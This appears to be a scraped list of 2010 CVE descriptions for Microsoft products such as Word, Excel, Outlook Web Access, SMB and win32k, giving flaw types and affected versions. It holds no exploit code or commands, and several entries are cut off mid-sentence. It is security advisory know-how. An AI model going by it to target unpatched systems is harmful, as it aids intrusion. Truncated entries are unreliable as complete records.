[CVE-2010-3215] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle unspecified return values during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Return Value Vulnerability." [CVE-2010-3214] Stack-based buffer overflow in Microsoft Word 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2010-3213] Cross-site request forgery (CSRF) vulnerability in Microsoft Outlook Web Access (owa/ev.owa) 2007 through SP2 allows remote attackers to hijack the authentication of e-mail users for requests that perform Outlook requests, as demonstrated by setting the auto-forward rule. [CVE-2010-3200] MSO.dll in Microsoft Word 2003 SP3 11.8326.11.8324 allows remote attackers to cause a denial of service (NULL pointer dereference and multiple-instance application crash) via a crafted buffer in a Word document, as demonstrated by word_crash_11.8326.8324_poc.doc. [CVE-2010-3190] Untrusted search path vulnerability in the Microsoft Foundation Class (MFC) Library in Microsoft Visual Studio .NET 2003 SP1 [CVE-2010-3148] Untrusted search path vulnerability in Microsoft Visio 2003 SP3 allows local users to gain privileges via a Trojan horse mfc71enu.dll file in the current working directory, as demonstrated by a directory that contains a .vsd, .vdx, .vst, or .vtx file, aka "Microsoft Visio Insecure Library Loading Vulnerability." [CVE-2010-3147] Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143. [CVE-2010-3146] Multiple untrusted search path vulnerabilities in Microsoft Groove 2007 SP2 allow local users to gain privileges via a Trojan horse (1) mso.dll or (2) GroovePerfmon.dll file in the current working directory, as demonstrated by a directory that contains a Groove vCard (.vcg) or Groove Tool Archive (.gta) file, aka "Microsoft Groove Insecure Library Loading Vulnerability." [CVE-2010-3144] Untrusted search path vulnerability in the Internet Connection Signup Wizard in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse smmscrpt.dll file in the current working directory, as demonstrated by a directory that contains an ISP or INS file, aka "Internet Connection Signup Wizard Insecure Library Loading Vulnerability." [CVE-2010-3142] Untrusted search path vulnerability in Microsoft Office PowerPoint 2007 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse rpawinet.dll that is located in the same folder as a .odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx file. [CVE-2010-2750] Array index error in Microsoft Word 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Index Vulnerability." [CVE-2010-2748] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly check an unspecified boundary during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Boundary Check Vulnerability." [CVE-2010-2747] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle an uninitialized pointer during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Uninitialized Pointer Vulnerability." [CVE-2010-2746] Heap-based buffer overflow in Comctl32.dll (aka the common control library) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when a third-party SVG viewer is used, allows remote attackers to execute arbitrary code via a crafted HTML document that triggers unspecified messages from this viewer, aka "Comctl32 Heap Overflow Vulnerability." [CVE-2010-2744] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly manage a window class, which allows local users to gain privileges by creating a window, then using (1) the SetWindowLongPtr function to modify the popup menu structure, or (2) the SwitchWndProc function with a switch window information pointer, which is not re-initialized when a WM_NCCREATE message is processed, aka "Win32k Window Class Vulnerability." [CVE-2010-2742] The Netlogon RPC Service in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, and R2, when the domain controller role is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted RPC packet, aka "Netlogon RPC Null dereference DOS Vulnerability." [CVE-2010-2741] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 performs an incorrect integer calculation during font processing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Validation Vulnerability." [CVE-2010-2740] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly perform memory allocation during font parsing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Parsing Vulnerability." [CVE-2010-2739] Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2729] The Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when printer sharing is enabled, does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2010, aka "Print Spooler Service Impersonation Vulnerability." [CVE-2010-2728] Heap-based buffer overflow in Microsoft Outlook 2002 SP3, 2003 SP3, and 2007 SP2, when Online Mode for an Exchange Server is enabled, allows remote attackers to execute arbitrary code via a crafted e-mail message, aka "Heap Based Buffer Overflow in Outlook Vulnerability." [CVE-2010-2573] Integer underflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3, PowerPoint Viewer SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint Integer Underflow Causes Heap Corruption Vulnerability." [CVE-2010-2572] Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint 95 document, aka "PowerPoint Parsing Buffer Overflow Vulnerability." [CVE-2010-2571] Array index error in pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher 97 file, aka "Memory Corruption Due To Invalid Index Into Array in Pubconv.dll Vulnerability." [CVE-2010-2570] Heap-based buffer overflow in pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3, 2003 SP3, 2007 SP2, and 2010 allows remote attackers to execute arbitrary code via a crafted Publisher file that uses an old file format, aka "Heap Overrun in pubconv.dll Vulnerability." [CVE-2010-2569] pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3, 2003 SP3, and 2007 SP2 does not properly handle an unspecified size field in certain older file formats, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted Publisher file, aka "Size Value Heap Corruption in pubconv.dll Vulnerability." [CVE-2010-2568] Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems. [CVE-2010-2567] The RPC client implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly allocate memory during the parsing of responses, which allows remote RPC servers and man-in-the-middle attackers to execute arbitrary code via a malformed response, aka "RPC Memory Corruption Vulnerability." [CVE-2010-2566] The Secure Channel (aka SChannel) security package in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, does not properly validate certificate request messages from TLS and SSL servers, which allows remote servers to execute arbitrary code via a crafted SSL response, aka "SChannel Malformed Certificate Request Remote Code Execution Vulnerability." [CVE-2010-2563] The Word 97 text converter in the WordPad Text Converters in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse malformed structures in Word 97 documents, which allows remote attackers to execute arbitrary code via a crafted document containing an unspecified value that is used in a loop counter, aka "WordPad Word 97 Text Converter Memory Corruption Vulnerability." [CVE-2010-2562] Microsoft Office Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Excel file, aka "Excel Memory Corruption Vulnerability." [CVE-2010-2555] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the length of strings in the registry, which allows local users to gain privileges or cause a denial of service (memory corruption) via vectors involving a long string, aka "Tracing Memory Corruption Vulnerability." [CVE-2010-2554] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka "Tracing Registry Key ACL Vulnerability." [CVE-2010-2552] Stack consumption vulnerability in the SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (system hang) via a malformed SMBv2 compounded request, aka "SMB Stack Exhaustion Vulnerability." [CVE-2010-2551] The SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate an internal variable in an SMB packet, which allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 packet, aka "SMB Variable Validation Vulnerability." [CVE-2010-2550] The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." [CVE-2010-2549] Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability." [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-2084] Microsoft ASP.NET 2.0 does not prevent setting the InnerHtml property on a control that inherits from HtmlContainerControl, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to an attribute. [CVE-2010-1903] Microsoft Office Word 2002 SP3 and 2003 SP3, and Office Word Viewer, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a malformed record in a Word file, aka "Word HTML Linked Objects Memory Corruption Vulnerability." [CVE-2010-1902] Buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1901] Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1900] Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1897] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate pseudo-handle values in callback parameters during window creation, which allows local users to gain privileges via a crafted application, aka "Win32k Window Creation Vulnerability." [CVE-2010-1896] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 do not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k User Input Validation Vulnerability." [CVE-2010-1895] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly perform memory allocation before copying user-mode data to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k Pool Overflow Vulnerability." [CVE-2010-1894] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability." [CVE-2010-1893] Integer overflow in the TCP/IP stack in Microsoft Windows Vista SP1, Windows Server 2008 Gold and R2, and Windows 7 allows local users to gain privileges via a buffer of user-mode data that is copied to kernel mode, aka "Integer Overflow in Windows Networking Vulnerability." [CVE-2010-1892] The TCP/IP stack in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle malformed IPv6 packets, which allows remote attackers to cause a denial of service (system hang) via multiple crafted packets, aka "IPv6 Memory Corruption Vulnerability." [CVE-2010-1891] The Client/Server Runtime Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2, when a Chinese, Japanese, or Korean locale is enabled, does not properly allocate memory for transactions, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Elevation of Privilege Vulnerability." [CVE-2010-1890] The kernel in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate ACLs on kernel objects, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Improper Validation Vulnerability." [CVE-2010-1889] Double free vulnerability in the kernel in Microsoft Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2, allows local users to gain privileges via a crafted application, related to object initialization during error handling, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-1887] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Win32k Bounds Checking Vulnerability." [CVE-2010-1886] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 SP2 and R2, and Windows 7 allow local users to gain privileges by leveraging access to a process with NetworkService credentials, as demonstrated by TAPI Server, SQL Server, and IIS processes, and related to the Windows Service Isolation feature. NOTE: the vendor states that privilege escalation from NetworkService to LocalSystem does not cross a "security boundary." [CVE-2010-1885] The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability." [CVE-2010-1883] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted table in an embedded font, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2010-1882] Multiple buffer overflows in the MPEG Layer-3 Audio Codec for Microsoft DirectShow in l3codecx.ax in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote attackers to execute arbitrary code via an MPEG Layer-3 audio stream in (1) a crafted media file or (2) crafted streaming content, aka "MPEG Layer-3 Audio Decoder Buffer Overflow Vulnerability." [CVE-2010-1881] The FieldList ActiveX control in the Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 does not properly interact with the memory-access approach used by Internet Explorer and Office during instantiation, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via an HTML document that references this control along with crafted persistent storage data, aka "ACCWIZ.dll Uninitialized Variable Vulnerability." [CVE-2010-1880] Unspecified vulnerability in Quartz.dll for DirectShow on Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1, and Server 2008 allows remote attackers to execute arbitrary code via a media file with crafted compression data, aka "MJPEG Media Decompression Vulnerability." [CVE-2010-1735] The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1734] The SfnINSTRING function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x18d value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1690] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 does not verify that transaction IDs of responses match transaction IDs of queries, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1689] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 uses predictable transaction IDs that are formed by incrementing a previous ID by 1, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1263] Windows Shell and WordPad in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 [CVE-2010-1257] Cross-site scripting (XSS) vulnerability in the toStaticHTML API, as used in Microsoft Office InfoPath 2003 SP3, 2007 SP1, and 2007 SP2 [CVE-2010-1255] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 allows local users to execute arbitrary code via vectors related to "glyph outline information" and TrueType fonts, aka "Win32k TrueType Font Parsing Vulnerability." [CVE-2010-1253] Microsoft Office Excel 2002 SP3, 2007 SP1, and SP2 [CVE-2010-1252] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Excel file, aka "Excel String Variable Vulnerability." [CVE-2010-1251] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Excel file, aka "Excel Record Stack Corruption Vulnerability." [CVE-2010-1250] Heap-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with malformed (1) EDG (0x88) and (2) Publisher (0x89) records, aka "Excel EDG Memory Corruption Vulnerability." [CVE-2010-1249] Buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed ExternName (0x23) record, aka "Excel Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0823 and CVE-2010-1247. [CVE-2010-1248] Buffer overflow in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed HFPicture (0x866) record, aka "Excel HFPicture Memory Corruption Vulnerability." [CVE-2010-1247] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel file with a malformed RTD (0x813) record that triggers heap corruption, aka "Excel Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0823 and CVE-2010-1249. [CVE-2010-1246] Stack-based buffer overflow in Microsoft Office Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel file with a malformed RTD (0x813) record, aka "Excel RTD Memory Corruption Vulnerability." [CVE-2010-1245] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed SxView (0xB0) record, aka "Excel Record Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0824 and CVE-2010-0821. [CVE-2010-1225] The memory-management implementation in the Virtual Machine Monitor (aka VMM or hypervisor) in Microsoft Virtual PC 2007 Gold and SP1, Virtual Server 2005 Gold and R2 SP1, and Windows Virtual PC does not properly restrict access from the guest OS to memory locations in the VMM work area, which allows context-dependent attackers to bypass certain anti-exploitation protection mechanisms on the guest OS via crafted input to a vulnerable application. NOTE: the vendor reportedly found that only systems with an otherwise vulnerable application are affected, because "the memory areas accessible from the guest cannot be leveraged to achieve either remote code execution or elevation of privilege and ... no data from the host is exposed to the guest OS." [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-0917] Stack-based buffer overflow in VBScript in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, might allow user-assisted remote attackers to execute arbitrary code via a long string in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution when the F1 key is pressed, a different vulnerability than CVE-2010-0483. [CVE-2010-0824] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed WOPT (0x80B) record, aka "Excel Record Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0821 and CVE-2010-1245. [CVE-2010-0823] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, 2003 SP3, 2007 SP1 and SP2 [CVE-2010-0822] Stack-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted OBJ (0x5D) record, aka "Excel Object Stack Overflow Vulnerability." [CVE-2010-0821] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, 2003 SP3, 2007 SP1 and SP2 [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2010-0819] Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability." [CVE-2010-0818] The MPEG-4 codec in the Windows Media codecs in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly handle crafted media content with MPEG-4 video encoding, which allows remote attackers to execute arbitrary code via a file in an unspecified "supported format," aka "MPEG-4 Codec Vulnerability." [CVE-2010-0817] Cross-site scripting (XSS) vulnerability in _layouts/help.aspx in Microsoft SharePoint Server 2007 12.0.0.6421 and possibly earlier, and SharePoint Services 3.0 SP1 and SP2, versions, allows remote attackers to inject arbitrary web script or HTML via the cid0 parameter. [CVE-2010-0815] VBE6.DLL in Microsoft Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Visual Basic for Applications (VBA), and VBA SDK 6.3 through 6.5 does not properly search for ActiveX controls that are embedded in documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "VBE6.DLL Stack Memory Corruption Vulnerability." [CVE-2010-0814] The Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 and 2007 SP1 and SP2 do not properly interact with the memory-allocation approach used by Internet Explorer during instantiation, which allows remote attackers to execute arbitrary code via a web site that references multiple ActiveX controls, as demonstrated by the ImexGrid and FieldList controls, aka "Access ActiveX Control Vulnerability." [CVE-2010-0812] Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to bypass intended IPv4 source-address restrictions via a mismatched IPv6 source address in a tunneled ISATAP packet, aka "ISATAP IPv6 Source Address Spoofing Vulnerability." [CVE-2010-0811] Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability." [CVE-2010-0810] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, does not properly handle unspecified exceptions, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0719] An unspecified API in Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 does not validate arguments, which allows local users to cause a denial of service (system crash) via a crafted application. [CVE-2010-0487] The Authenticode Signature verification functionality in cabview.dll in Cabinet File Viewer Shell Extension 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows remote attackers to execute arbitrary code via a modified cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "Cabview Corruption Validation Vulnerability." [CVE-2010-0486] The WinVerifyTrust function in Authenticode Signature Verification 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows user-assisted remote attackers to execute arbitrary code via a modified (1) Portable Executable (PE) or (2) cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2010-0485] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 "do not properly validate all callback parameters when creating a new window," which allows local users to execute arbitrary code, aka "Win32k Window Creation Vulnerability." [CVE-2010-0484] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 "do not properly validate changes in certain kernel objects," which allows local users to execute arbitrary code via vectors related to Device Contexts (DC) and the GetDCEx function, aka "Win32k Improper Data Validation Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0482] The kernel in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate relocation sections of image files, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Malformed Image Vulnerability." [CVE-2010-0481] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly translate a registry key's virtual path to its real path, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Virtual Path Parsing Vulnerability." [CVE-2010-0480] Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability." [CVE-2010-0479] Buffer overflow in Microsoft Office Publisher 2002 SP3, 2003 SP3, and 